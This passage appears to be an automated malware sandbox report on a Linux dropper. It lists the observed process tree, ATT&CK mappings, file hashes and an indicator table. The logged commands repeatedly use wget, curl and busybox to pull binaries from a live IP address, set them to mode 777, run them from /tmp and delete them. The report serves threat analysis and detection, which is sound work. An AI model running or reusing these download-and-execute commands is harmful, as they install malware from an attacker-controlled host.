  chmod 777 DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - File and Directory Permissions Modification
  PID:962
- /tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  ./DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  - Executes dropped EXE
  PID:963
- /bin/rm
  rm DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
  2⤵
  PID:964
- /usr/bin/wget
  wget http://216.126.231.240/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:965
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:966
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:967
- /bin/chmod
  chmod 777 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  ./7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm 7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
  2⤵
  PID:970
- /usr/bin/wget
  wget http://216.126.231.240/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:971
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:972
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:973
- /bin/chmod
  chmod 777 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - File and Directory Permissions Modification
  PID:974
- /tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  ./4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  - Executes dropped EXE
  PID:975
- /bin/rm
  rm 4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
  2⤵
  PID:976
- /usr/bin/wget
  wget http://216.126.231.240/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:977
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:978
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:979
- /bin/chmod
  chmod 777 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - File and Directory Permissions Modification
  PID:980
- /tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  ./6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  - Executes dropped EXE
  PID:981
- /bin/rm
  rm 6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
  2⤵
  PID:982

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	740	UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	747	j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	765	1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	788	Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	813	eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	819	Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	837	QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	861	0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	867	hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	873	WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	879	DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	885	7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	891	4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	897	6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM
/tmp/UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP	903	UoRyl2lhutvMau6FiKPjhLoLMl3xhNH2fP
/tmp/j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m	909	j97Ay1rTea68yHCEg6UiZxRQrYLxHPeo6m
/tmp/1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX	915	1cIYzwt6JDR8EWUvljYiVxsP545tvkdNSX
/tmp/Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL	921	Io9KNujd3gpafxEXomwWz9kLk2R4XuAklL
/tmp/eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh	927	eKyz44kdHGCRqa2TU3N7X7LQxBCnVOqdxh
/tmp/Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y	933	Sam2sLqRfnReUviGturEoyCUFl1jqOPc9y
/tmp/QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG	939	QaznoZnVA7rYUVvwVLdWxXCTgBB6QlWsLG
/tmp/0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d	945	0qjKCHcbPROPnNbpGXduVmJSgkMlGG5r2d
/tmp/hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s	951	hFwHRgLXgHagNw7KJ0jJpEtrzcVQSd6D4s
/tmp/WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t	957	WHtB0w7AyJKY7ISzzZw1OwL5EdiAhmXy1t
/tmp/DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8	963	DhCoNomQWRUxLbTZx44i2vbQRWjZyZuIH8
/tmp/7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv	969	7A7PvvCNpViBUKZkiWVxpkxvi7GG6lFNfv
/tmp/4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx	975	4dBVtk1vhb1AiDCIN0BgsrsCvap1nxGlnx
/tmp/6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM	981	6BRbXv9eOTtC5X3dE5WrniXe07KOlsmKKM